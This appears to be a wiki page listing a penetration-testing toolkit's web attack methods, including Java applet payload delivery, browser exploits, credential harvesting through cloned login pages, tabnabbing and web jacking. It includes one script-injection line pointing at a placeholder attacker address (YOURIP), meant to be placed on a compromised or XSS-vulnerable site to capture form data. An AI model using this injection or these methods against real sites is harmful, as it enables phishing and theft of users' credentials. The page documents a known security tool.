Jump to navigation Jump to search
|You are here:|
Website Attack Vectors
- Java Applet Attack Method
- The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
- Metasploit Browser Exploit Method
- The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
- Credential Harvester Attack Method
- The Credential Harvester method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.
- Tabnabbing Attack Method
- The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
- Man Left in the Middle Attack Method
- The Man Left in the Middle Attack method was introduced by Kos and utilizes HTTP REFERER's in order to intercept fields and harvest data from them. You need to have an already vulnerable site and incorporate <script src="http://YOURIP/">. This could either be from a compromised site or through XSS.
- Web Jacking Attack Method
- The Web-Jacking Attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
- Multi-Attack Web Method
- The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.